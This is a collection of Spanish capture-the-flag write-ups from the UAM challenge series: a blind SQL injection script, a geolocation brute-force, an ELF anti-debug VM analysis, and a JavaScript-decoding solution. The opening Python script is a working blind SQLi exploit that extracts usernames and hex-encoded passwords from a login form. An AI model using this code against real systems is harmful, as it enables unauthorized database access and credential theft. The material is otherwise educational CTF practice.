 41 |     headers = {'Content-Type': 'application/x-www-form-urlencoded'}
 42 |     for i in range(0,255):
 43 |         username="username=%' OR (SELECT CASE WHEN ((SELECT count(username) FROM users)="+str(i)+") THEN '1' ELSE '0' END)='1&password=1234&submit=Login"
 44 |         with requests.Session() as s:
 45 |             payload='username=%s&password=1234=&submit=Login' % (username)
 46 |             r = s.post(url, data = payload, headers = headers, verify = False, allow_redirects = False)
 47 |             cookies=s.cookies.get_dict()
 48 |             cookie=cookies['session']
 49 |             session_payload = cookie.split('.')[0]
 50 |             
 51 |             if r.status_code == 302 and session_payload=='eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIkluY29ycmVjdCBwYXNzd29yZCBmb3IgdXNlciBQZXBpIl19XX0':
 52 |                 print("\t\t %s users found." % (i))
 53 |                 i += 1
 54 |                 break
 55 |     return i
 56 | 
 57 | def getUserNames(maxusers=3):
 58 |     p.print_good('USERNAMES:')
 59 |     users=[]
 60 | 
 61 |     url='http://34.253.120.147:1730/login'
 62 |     headers = {'Content-Type': 'application/x-www-form-urlencoded'}
 63 |     
 64 |     for u in range(0,maxusers-1):
 65 |         db_username=''
 66 |         p.print_info("User: "+str(u+1))
 67 |         i=1
 68 |         while i <= 5:
 69 |           for c in string.printable:
 70 |             if c in ['*','+','.','?','|','&', '$', '\\']:
 71 |                 c = ''
 72 |             username="username=%' OR (SELECT CASE WHEN ((SELECT substr(username,"+str(i)+",1) FROM users ORDER BY username asc LIMIT 1 OFFSET "+str(u)+")='"+c+"') THEN '1' ELSE '0' END)='1&password=1234&submit=Login"
 73 |             print("\t\t\t[+] Character:" + c)
 74 |             with requests.Session() as s:
 75 |                 payload='username=%s&password=1234=&submit=Login' % (username)
 76 |                 r = s.post(url, data = payload, headers = headers, verify = False, allow_redirects = False)
 77 |                 cookies=s.cookies.get_dict()
 78 |                 cookie=cookies['session']
 79 |                 session_payload = cookie.split('.')[0]
 80 |                 
 81 |                 if r.status_code == 302 and session_payload=='eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIkluY29ycmVjdCBwYXNzd29yZCBmb3IgdXNlciBQZXBpIl19XX0':
 82 |                     p.print_good("Username character found: %s" % (db_username+c))
 83 |                     db_username += c
 84 |                     i += 1
 85 |                     break
 86 |         users.append(db_username)
 87 |     return users
 88 | 
 89 | def getPasswordsHex(users):
 90 |     db_username=''
 91 |     db_password=''
 92 |     #usernames=["Pepi","Luci","Bom"]
 93 |     usernames=users
 94 |     p.print_info('Usernames to process: [%s]' % ', '.join(map(str, usernames)))
 95 |     p.print_good('PASSWORDS:')
 96 |     for user in usernames:
 97 |         db_username=''
 98 |         db_username_array=[]
 99 |         p.print_good("USERNAME: "+user)
100 |         print("\t\t",end="",flush=True)
101 |         url='http://34.253.120.147:1730/login'
102 |         headers = {'Content-Type': 'application/x-www-form-urlencoded'}
103 |         i=1
104 |         while i <= 60:
105 |           #pb_passhex=tqdm(total=60,desc="DB Password")
106 |           for c in range(0,255):
107 |             username="username=%' OR (SELECT CASE WHEN ((SELECT hex(substr(password,"+str(i)+",1)) FROM users WHERE username='"+user+"' ORDER BY username asc LIMIT 1)=printf('%X', "+str(hex(c))+")) THEN '1' ELSE '0' END)='1&password=1234&submit=Login"
108 |             
109 |             with requests.Session() as s:
110 |                 payload='username=%s&password=1234=&submit=Login' % (username)
111 |                 #print(payload)
112 |                 r = s.post(url, data = payload, headers = headers, verify = False, allow_redirects = False)
113 |                 cookies=s.cookies.get_dict()
114 |                 cookie=cookies['session']
115 |                 session_payload = cookie.split('.')[0]
116 |             if r.status_code == 302 and session_payload=='eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIkluY29ycmVjdCBwYXNzd29yZCBmb3IgdXNlciBQZXBpIl19XX0':
117 |                 print(chr(int(hex(c),16)), sep='', end='',flush=True)
118 |                 #if i  % 10==0:
119 |                 #    print("\t"+"["+str(i)+"] Username character found: %s" % (db_username+" "+str(hex(c))))
120 |                 db_username += " "+str(hex(c))
121 |                 db_username_array.append(str(hex(c)))
122 |                 #pb_passhex.update(1.666667)
123 |                 i += 1
124 |                 if i == 60:
125 |                     p.print_good(" HEX-DECODED PASSWORD:"+''.join(chr(int(char, 16)) for char in db_username_array[1:]))
126 |                 break
127 |         #pb_passhex.close()
128 | 
129 | if __name__ == '__main__':
130 |     p.print_title("UAM BreakingBad 001 - Blind SQLi")
131 |     getMaxTables()
132 |     u=getMaxUsers()
133 |     users=getUserNames(u)
134 |     getPasswordsHex(users)
135 | 
136 | 
137 | 


--------------------------------------------------------------------------------
/writeups/breakingbad/episodio1/masi/masi - UAM_BreakingBad_EP1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/breakingbad/episodio1/masi/masi - UAM_BreakingBad_EP1.pdf


--------------------------------------------------------------------------------
/writeups/breakingbad/episodio2/arsenics/Arsenics_Breaking bad episode 2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/breakingbad/episodio2/arsenics/Arsenics_Breaking bad episode 2.pdf


--------------------------------------------------------------------------------
/writeups/breakingbad/episodio2/masi/masi - UAM_BreakingBad_EP2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/breakingbad/episodio2/masi/masi - UAM_BreakingBad_EP2.pdf


--------------------------------------------------------------------------------
/writeups/breakingbad/episodio3/j0n3/Breaking Bad - Episodio 3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/breakingbad/episodio3/j0n3/Breaking Bad - Episodio 3.pdf


--------------------------------------------------------------------------------
/writeups/dragonball/episodio1/M3n0s_D0n4ld/M3n0s_D0n4ld-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio1/M3n0s_D0n4ld/M3n0s_D0n4ld-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/dragonball/episodio1/M3n0s_D0n4ld/a:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/writeups/dragonball/episodio1/bicacaro/bicacaro-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio1/bicacaro/bicacaro-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/dragonball/episodio1/j0n3/j0n3-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio1/j0n3/j0n3-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/dragonball/episodio1/julianjm/julianjm-episodio1.md:
--------------------------------------------------------------------------------
  1 | # UAM - Dragon Ball - Episorio 1 - julianjm
  2 | 
  3 | _15/07/2019_
  4 | 
  5 | > Hay web con un radar que indica si una bola está en el rango de detección. La ubicación la obtiene del navegador.
  6 | >
  7 | > Existe otro servicio que, pasándole el nombre correto, devuelve la flag.
  8 | >
  9 | > [Enunciado completo](https://unaalmes.hispasec.com/challenges#EPISODIO%20)
 10 | 
 11 | ## El (mardito) radar
 12 | 
 13 | Al entrar en la página nos pide acceso a la ubicación y vemos un radar con un mensaje que indica nuestras coordenadas y el mensaje "No estás cerca de ninguna bola de dragón"
 14 | 
 15 | Viendo las peticiones que hace la página, usando el inspector de red, vemos que realiza una llamada a serv◊er.php, enviando como parámetros lat y lng correspondientes a nuestra ubicación. La respuesta: `{"success":0}`
 16 | 
 17 | Analizamos el código javascript, y vemos, en client.js, una función relevante:
 18 | 
 19 | ```javascript
 20 | function showPosition(position) {
 21 |     $.ajax({
 22 |         type: "POST",
 23 |         url: 'server.php',
 24 |         data: {'lat':position.coords.latitude, 'lng': position.coords.longitude},
 25 |         
 26 |         success: function(response) {
 27 |             var jsonData = JSON.parse(response);
 28 |             if (jsonData.success != 0) {
 29 |                 output.innerHTML = "¡Estás cerca de la bola de dragón de " + jsonData.stars + " estrella(s)! Se encuentra en "
 30 |                 + jsonData.city + ". (lat: " + jsonData.lat + " / lng: " + jsonData.lng + ")";
 31 |                 document.getElementsByClassName("points")[0].innerHTML = jsonData.locInRadar;
 32 |             } else if (jsonData.success == 0)
 33 |                 output.innerHTML = "Te encuentras en " + position.coords.latitude + " / " + position.coords.longitude + ". No estás cerca de ninguna bola de dragón.";
 34 |         }
 35 |     });
 36 |     //continua, pero lo imporatnte está arriba
 37 | }
 38 | ```
 39 | 
 40 | La función `showPosition` se ejecuta cada vez que cambia la ubicación, o cuando se entra por primera vez. Vemos la llamada a `server.php` con los parámetros `lat`y `lng`. 
 41 | 
 42 | Cuando estamos cerca de una bola, un dato importante que nos indica es la ciudad en la que se encuentra. Es decir, no están distribuidas al azar por el globo (flat earthers may disagree), sino que se encuentran en ciudades. Supondremos también que están en ciudades importantes a nivel de población (ignoraremos Triquivijate y Calzadilla de los Barros).
 43 | 
 44 | ## Automatización
 45 | 
 46 | No es viable de recorrer las principales ciudades del mundo, como si buscásemos Pokemones. La idea es obtener un listado de ciudades del mundo, con sus coordenadas GPS, y realizar peticiones a `server.php`, hasta que demos con las 7 bolas.
 47 | 
 48 | Hay varios listados de ciudades, más o menos completos. El que usé yo fue el básico de esta página: https://simplemaps.com/data/world-cities. Unas 13.000 ciudades. El formato es el siguiente:
 49 | ```c
 50 | "city","city_ascii","lat","lng","country","iso2","iso3","admin_name","capital","population","id"
 51 | "Malishevë","Malisheve","42.4822","20.7458","Kosovo","XK","XKS","Malishevë","admin","","1901597212"
 52 | "Prizren","Prizren","42.2139","20.7397","Kosovo","XK","XKS","Prizren","admin","","1901360309"
 53 | "Zubin Potok","Zubin Potok","42.9144","20.6897","Kosovo","XK","XKS","Zubin Potok","admin","","1901608808"
 54 | "Kamenicë","Kamenice","42.5781","21.5803","Kosovo","XK","XKS","Kamenicë","admin","","1901851592"
 55 | "Viti","Viti","42.3214","21.3583","Kosovo","XK","XKS","Viti","admin","","1901328795"
 56 | "Shtërpcë","Shterpce","42.2394","21.0272","Kosovo","XK","XKS","Shtërpcë","admin","","1901828239"
 57 | "Shtime","Shtime","42.4331","21.0397","Kosovo","XK","XKS","Shtime","admin","","1901598505"
 58 | "Vushtrri","Vushtrri","42.8231","20.9675","Kosovo","XK","XKS","Vushtrri","admin","","1901107642"
 59 | "Dragash","Dragash","42.0265","20.6533","Kosovo","XK","XKS","Dragash","admin","","1901112530"
 60 | ```
 61 | 
 62 | Cargamos a una lista las coordenadas de todas las ciudades:
 63 | 
 64 | ```python
 65 | coords = []
 66 | with open("worldcities.csv","r") as f:
 67 |     f.readline()
 68 |     for line in f:
 69 |         cols = line.split(",")
 70 |         lat = float(cols[2].strip('"'))
 71 |         lng = float(cols[3].strip('"'))
 72 |         coords.append([lat,lng])
 73 | ```
 74 | 
 75 | Definimos la función que hará la petición a server.php:
 76 | 
 77 | ```python
 78 | import requests
 79 | import time
 80 | 
 81 | URL="https://34.253.120.147/dragonball/episodio1/server.php"
 82 | 
 83 | def check(lat,lng):
 84 |     data={ "lat":lat, "lng":lng }
 85 |     try:
 86 |         r = requests.post(URL, data=data, verify=False)
 87 |         if "city" in r.text:
 88 |             print(r.text)
 89 |     except:
 90 |         print("Exception.. sleeping 5 secs")
 91 |         time.sleep(5)
 92 | ```
 93 | 
 94 | Por último, iteramos el listado de coordenadas:
 95 | 
 96 | ```python
 97 | for lat,lng in coords:
 98 |     check(lat,lng)
 99 | ```
100 | 
101 | Al principio la sensibilidad del radar era mucho más limitada, y había que multiplicar el numero de peticiones, de forma que se cubriese un area alrededor de cada coordenada. Para no morir en el intento, usamos multithreading (una librería DoS de python):
102 | 
103 | ```python
104 | OFFSET=0.015
105 | 
106 | POOLSIZE=500
107 | 
108 | # Función que procesa hasta POOLSIZE coordenadas, empezando en start
109 | def doit(start):
110 |     print("Processing %d starting at %d" % (POOLSIZE, start))
111 |     for lat,lng in coords[start:start+POOLSIZE]:
112 |         # La coordenada original
113 |         check(lat,lng)
114 |         # El cuadrado que rodea la coordenada original
115 |         check(lat+OFFSET,   lng         )
116 |         check(lat,          lng+OFFSET  )
117 |         check(lat+OFFSET,   lng+OFFSET  )
118 |         check(lat-OFFSET,   lng         )
119 |         check(lat,          lng-OFFSET  )
120 |         check(lat-OFFSET,   lng-OFFSET  )
121 |         check(lat+OFFSET,   lng-OFFSET  )
122 |         check(lat-OFFSET,   lng+OFFSET  )
123 |         # Con un poco más de radio. La M50, vamos.
124 |         check(lat               , lng + OFFSET*2  )
125 |         check(lat               , lng - OFFSET*2  )
126 |         check(lat + OFFSET*2    , lng             )
127 |         check(lat - OFFSET*2    , lng             )
128 |         check(lat + OFFSET*2    , lng + OFFSET*2  )
129 |         check(lat + OFFSET*2    , lng - OFFSET*2  )
130 |         check(lat - OFFSET*2    , lng + OFFSET*2  )
131 |         check(lat - OFFSET*2    , lng - OFFSET*2  )
132 | 
133 | # Configuramos el número de subprocesos:
134 | pool = Pool(processes=5)
135 | # Cargamos los trabajos.. de 0 a numero de coordenadas, cada POOLSIZE elementos
136 | pool.map(doit, range(0,len(coords),POOLSIZE))
137 | ```
138 | 
139 | Si todo va bien obtenemos las siguientes bolas:
140 | 
141 | ```json
142 | {"stars":1,"city":"Damasco","lat":33.513645,"lng":36.276762,"locInRadar":"<circle cx=\"150\" cy=\"150\" r=\"10\"><\/circle>"}
143 | {"stars":2,"city":"Ronda","lat":36.745473,"lng":-5.161438,"locInRadar":"<circle cx=\"250\" cy=\"125\" r=\"10\"><\/circle>"}
144 | {"stars":3,"city":"Guam","lat":13.440439,"lng":144.779184,"locInRadar":"<circle cx=\"125\" cy=\"270\" r=\"10\"><\/circle>"}
145 | {"stars":4,"city":"Ulan Bator","lat":47.906641,"lng":106.895085,"locInRadar":"<circle cx=\"50\" cy=\"240\" r=\"10\"><\/circle>"}
146 | {"stars":5,"city":"Estocolmo","lat":59.328694,"lng":18.068505,"locInRadar":"<circle cx=\"320\" cy=\"270\" r=\"10\"><\/circle>"}
147 | {"stars":6,"city":"Reikiavik","lat":64.145144,"lng":-21.942496,"locInRadar":"<circle cx=\"80\" cy=\"80\" r=\"10\"><\/circle>"}
148 | {"stars":7,"city":"Odessa","lat":46.482921,"lng":30.722892,"locInRadar":"<circle cx=\"30\" cy=\"280\" r=\"10\"><\/circle>"}
149 | ```
150 | 
151 | ## Gimme tha flag
152 | 
153 | Comprobamos el nombre (DRGUERO), usando el servicio del puerto 9999:
154 | 
155 | ```bash
156 | $ echo DRGUERO | nc 34.253.120.147 9999
157 | UAM{2f3c45a7fdd272de9f43836e5ca2f39c}
158 | ```
159 | 
160 | Como curiosidad, el inverso de ese md5 es: OPR4d4rftw
161 | 
162 | 
163 | ## Spam
164 | 
165 | [Julian J. M.](https://julianjm.com)
166 | 


--------------------------------------------------------------------------------
/writeups/dragonball/episodio1/nachinho3/nachinho3-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio1/nachinho3/nachinho3-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/dragonball/episodio2/j0n3/j0n3-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio2/j0n3/j0n3-episodio2.pdf


--------------------------------------------------------------------------------
/writeups/dragonball/episodio3/bicacaro/bicacaro-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio3/bicacaro/bicacaro-episodio3.pdf


--------------------------------------------------------------------------------
/writeups/dragonball/episodio3/julianjm/img/uam_he_visto_cosas.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio3/julianjm/img/uam_he_visto_cosas.jpg


--------------------------------------------------------------------------------
/writeups/dragonball/episodio3/julianjm/img/uam_init_array.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio3/julianjm/img/uam_init_array.png


--------------------------------------------------------------------------------
/writeups/dragonball/episodio3/julianjm/img/uam_malloc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio3/julianjm/img/uam_malloc.png


--------------------------------------------------------------------------------
/writeups/dragonball/episodio3/julianjm/img/uam_vector_constructor.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio3/julianjm/img/uam_vector_constructor.png


--------------------------------------------------------------------------------
/writeups/dragonball/episodio3/julianjm/img/uam_xd_cmp_eq.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio3/julianjm/img/uam_xd_cmp_eq.png


--------------------------------------------------------------------------------
/writeups/dragonball/episodio3/julianjm/img/uam_xd_run.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio3/julianjm/img/uam_xd_run.png


--------------------------------------------------------------------------------
/writeups/dragonball/episodio3/julianjm/img/uam_xd_xd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio3/julianjm/img/uam_xd_xd.png


--------------------------------------------------------------------------------
/writeups/dragonball/episodio3/julianjm/julianjm-episodio3.md:
--------------------------------------------------------------------------------
  1 | # UAM - Dragon Ball 3 - 15/10/2019 - julianjm
  2 | 
  3 | ## Enunciado
  4 | [Versión completa](https://unaalmes.hispasec.com/challenges#EPISODIO%203). Nos proporcionan un binario ELF64 para analizar e intentar descubrir la flag.
  5 | 
  6 | ## Análisis inicial
  7 | A primera vista, tenemos una función `main` de lo más sencillo. Inicializa un array con una serie de valores, les hace un XOR con un valor en la función `decrypt` y utiliza ese resultado para compararlo con la entrada del programa.
  8 | 
  9 | Nos damos cuenta rápido de que no todo va a ser tan fácil (n0t_s0_34sY). Por alguna razón está fallando al comparación de cadena con strcmp, pero solamente cuando _no_ estamos en modo debug. Lo único que tenemos claro es la longitud de la flag, 11.
 10 | 
 11 | ![He visto cosas](img/uam_he_visto_cosas.jpg?raw=true)
 12 | 
 13 | ## glibc __init_array
 14 | 
 15 | Pasan cosas antes del `main`. Durante la inicialización de la libc se ejecutan diversas funciones, entre ellas las definidas en la sección `__init_array` del ELF. Aquí está, por ejemplo, la ejecución de constructores de los objetos declarados de forma global, que tienen que estar inicializados cuando se empiece a ejecutar `main`.
 16 | 
 17 | ![__init_array](img/uam_init_array.png?raw=true)
 18 | 
 19 | Tirando del hilo llegamos al constructor de la clase vector, que no hace otra cosa que reemplazar la función `strcmp`, usada para comparar la flag en la función `main`, por otra que analizaremos más adelante.
 20 | 
 21 | ![__init_array](img/uam_vector_constructor.png?raw=true)
 22 | 
 23 | Este reemplazo, no obstante, solo ocurre bajo cierta condición, que no existan en la sección de código más de 6 bytes de valor `0xCC`. Este byte codifica la instrucción `int 3`, que es utilizada por los debugger para meter breakpoints por software. De esta forma, si hemos definido alguno (por ejemplo al inicio del `main`), el número de bytes será superior a 6 y no reemplazará nada, dejándonos un poco locker.
 24 | 
 25 | Una solución, es utilizar breakpoints por hardware, aunque están limitados en número. Estos breakpoints se basan en registros de la CPU y no en la modificación de la memoria para incluir llamadas a `int 3`, por lo que no serían detectados por esta técnica antidebugging.
 26 | 
 27 | ## VM
 28 | 
 29 | Llegados a este punto podemos debugear la función reemplazo de `strcmp`. Esta función crea una secuencia de enteros, en los que inserta el string que recibe como primer parámetro. Posteriormente crea un objeto de la clase `xd`, en cuyo constructor sucede la magia.
 30 | 
 31 | ![__init_array](img/uam_xd_xd.png?raw=true)
 32 | 
 33 | ![__init_array](img/uam_xd_run.png?raw=true)
 34 | 
 35 | Se trata de una máquina virtual, que valua una cadena de código formada por opcodes y datos. Hay diferentes opcodes definidos, JMP, MOVRV, XOR, EQ, JMP_NEQ. Analizando cada función, vemos qué datos utiliza y cómo los procesa. La operación `EQ`, por ejemplo, establece un registro interno a 1 si la igualdad (entre un valor definido en la instrucción y un valor de la memoria) es cierta.
 36 | 
 37 | ![__init_array](img/uam_xd_cmp_eq.png?raw=true)
 38 | 
 39 | Un pequeño script en python nos permitirá ver el código más claramente en un formato similar al ensamblador. Como la flag forma parte el código, utilizaremos para este desensamblado una flag incorrecta: "123456789ab"
 40 | 
 41 | ``` as
 42 |   0: JMP 3
 43 |   2: RETURN
 44 |   3: MOVRV mem[0], 11    # La longitud de la flag
 45 |   6: EQ mem[0], 11
 46 |   9: JMP_NEQ 2
 47 |  11: MOVRV mem[0], 49    # Primer caracter de la flag, '0'
 48 |  14: XOR [0], 210
 49 |  17: EQ mem[0], 149
 50 |  20: JMP_NEQ 2
 51 |  22: MOVRV mem[0], 50    # Segundo caracter de la flag '1'
 52 |  25: XOR mem[0], 214
 53 |  28: EQ mem[0], 230
 54 |  31: JMP_NEQ 2
 55 |  33: MOVRV mem[0], 51
 56 |  36: XOR mem[0], 135
 57 |  39: EQ mem[0], 211
 58 |  42: JMP_NEQ 2
 59 |  44: MOVRV mem[0], 52
 60 |  47: XOR mem[0], 234
 61 |  50: EQ mem[0], 181
 62 |  53: JMP_NEQ 2
 63 |  55: MOVRV mem[0], 53
 64 |  58: XOR mem[0], 212
 65 |  61: EQ mem[0], 188
 66 |  64: JMP_NEQ 2
 67 |  66: MOVRV mem[0], 54
 68 |  69: XOR mem[0], 2
 69 |  72: EQ mem[0], 50
 70 |  75: JMP_NEQ 2
 71 |  77: MOVRV mem[0], 55
 72 |  80: XOR mem[0], 27
 73 |  83: EQ mem[0], 43
 74 |  86: JMP_NEQ 2
 75 |  88: MOVRV mem[0], 56
 76 |  91: XOR mem[0], 9
 77 |  94: EQ mem[0], 98
 78 |  97: JMP_NEQ 2
 79 |  99: MOVRV mem[0], 57
 80 | 102: XOR mem[0], 172
 81 | 105: EQ mem[0], 157
 82 | 108: JMP_NEQ 2
 83 | 110: MOVRV mem[0], 97
 84 | 113: XOR mem[0], 16
 85 | 116: EQ mem[0], 126
 86 | 119: JMP_NEQ 2
 87 | 121: MOVRV mem[0], 98
 88 | 124: XOR mem[0], 170
 89 | 127: EQ mem[0], 205
 90 | 130: JMP_NEQ 2
 91 | 132: MOVRV mem[19], 1
 92 | 135: RETURN
 93 | ```
 94 | 
 95 | Vemos que la primera comprobación que realiza es si la longitud de la flag suministrada es igual a 11. En caso contrario, saltaría a la posición 2 y retornaría. El registro interno valdría 0 en este punto, por lo que la función retornaría incorrecto.
 96 | 
 97 | Posteriormente, carga en memoria el valor 49, correspondiente al primer caracter de la flag, en el ejemplo '0'. Le realiza una operación XOR con el valor 210 y compara el resultado con 149. Si coincide, pasa a analizar el siguiente caracter. Para averiguar el caracter necesario para que la comparación sea correcta, nos basta con realizar la operación 149 xor 210, que da como resultado 71. En ASCII corresponde al caracter 'G'.
 98 | 
 99 | Repitiendo la operación con el resto de la flag, obtenemos: *G0T_h00k1ng*
100 | 
101 | Convertimos al formato habitual (md5), y tenemos la flag definitiva:
102 | 
103 | UAM{7b02cd3d2d3cea80359cf600799413d3}
104 | 


--------------------------------------------------------------------------------
/writeups/dragonball/episodio3/nachinho3/nachinho3-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio3/nachinho3/nachinho3-episodio3.pdf


--------------------------------------------------------------------------------
/writeups/extra/extra/arsenics/arsenics-easymode.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/extra/extra/arsenics/arsenics-easymode.pdf


--------------------------------------------------------------------------------
/writeups/extra/extra/darkeagle/darkeagle-easymode.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/extra/extra/darkeagle/darkeagle-easymode.pdf


--------------------------------------------------------------------------------
/writeups/extra/extra/j0n3/j0n3-easymode.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/extra/extra/j0n3/j0n3-easymode.pdf


--------------------------------------------------------------------------------
/writeups/futurama/episodio3-1/arsenics/futurama3.1-bof-Arsenics.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/futurama/episodio3-1/arsenics/futurama3.1-bof-Arsenics.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/alejandroparras/alejandroparras-episodio1-1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-1/alejandroparras/alejandroparras-episodio1-1.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/bicacaro/bicacaro-episodio1-1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-1/bicacaro/bicacaro-episodio1-1.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/darkeagle/darkeagle-episodio1-1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-1/darkeagle/darkeagle-episodio1-1.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/j0n3/j0n3-episodio1-1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-1/j0n3/j0n3-episodio1-1.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/nachinho3/nachinho3-episodio1-1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-1/nachinho3/nachinho3-episodio1-1.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/oreos/oreos-episodio1-1.txt:
--------------------------------------------------------------------------------
 1 | NICK: oreos
 2 | 
 3 | SOLUCION: EPISODIO 1 - 1ª PARTE
 4 | 
 5 | 1. Accedemos a la URL de la caja fuerte: http://34.253.233.243/lacasadepapel/episodio1.
 6 | 
 7 | 2. Revisamos el código fuente, y encotramos un javascript interesante, 'login.js'.
 8 | 
 9 | /*
10 | 
11 | function conexion(){
12 |     var Password = "unescape%28String.fromCharCode%252880%252C%2520108%252C%252097%252C%2520110%2529%29:KZQWYZLOMNUWC===";
13 |     for (i = 0; i < Password.length; i++)
14 |     {
15 |         if (Password[i].indexOf(code1) == 0)
16 |         {
17 |             var TheSplit = Password[i].split(":");
18 |             var code1 = TheSplit[0];
19 |             var code2 = TheSplit[1];
20 |     }
21 | }
22 | 
23 | */
24 | 
25 | 3. Observamos que se realiza un split a la cadena "Password" con el delimitador ':' para obtener code1 y code2.
26 | 
27 | code1 = unescape%28String.fromCharCode%252880%252C%2520108%252C%252097%252C%2520110%2529%29 = unescape(String.fromCharCode(80, 108, 97, 110)) = Plan
28 | code2 = DecodeBase32(KZQWYZLOMNUWC===) = Valencia
29 | 
30 | 4. Insertamos los códigos en la página de la caja fuerte: http://34.253.233.243/lacasadepapel/episodio1.
31 | 
32 | El codigo para descomprimir el zip es:
33 | PR0F3S0R&R10
34 | 
35 | 5. Descomprimimos el zip usando el password obtenido.
36 | 
37 | $ 7z e episodio1.zip
38 | 
39 | 6. Ejecutamos con wine:
40 | 
41 | $ WINEPREFIX=~/.wine64 wine episodio1.exe
42 | System_Date: 05/15/18
43 | Wrong date R3m0!
44 | 
45 | -------------HINT---------------------
46 | 'La persistencia de la memoria...'
47 | --------------------------------------
48 | Pulse cualquier tecla para continuar...
49 | 
50 | 7. Usamos radare2 para realizar un análisis estático, y observamos que se realiza una comparación de la fecha actual con el 23 de enero de 1989 (cadena 01/23/89) en MD5 (observar adjuntos condition.png, win.png y lose.png). Cambiamos la fecha y obtenemos el flag:
51 | 
52 | $ sudo date -s '01/23/89'; WINEPREFIX=~/.wine64 wine episodio1.exe 
53 | lun ene 23 00:00:00 CET 1989
54 | 
55 | Congratulation!!, Stealing Money $$$...
56 | ----------------------------
57 | Stolen: 1.000.000.000 $ 
58 | ----------------------------
59 | Flag: e30f35ad8d9cb6efc0778539a669fa85
60 | ...........................................
61 | 
62 | 8. Obtenemos la Flag: e30f35ad8d9cb6efc0778539a669fa85
63 | 


--------------------------------------------------------------------------------
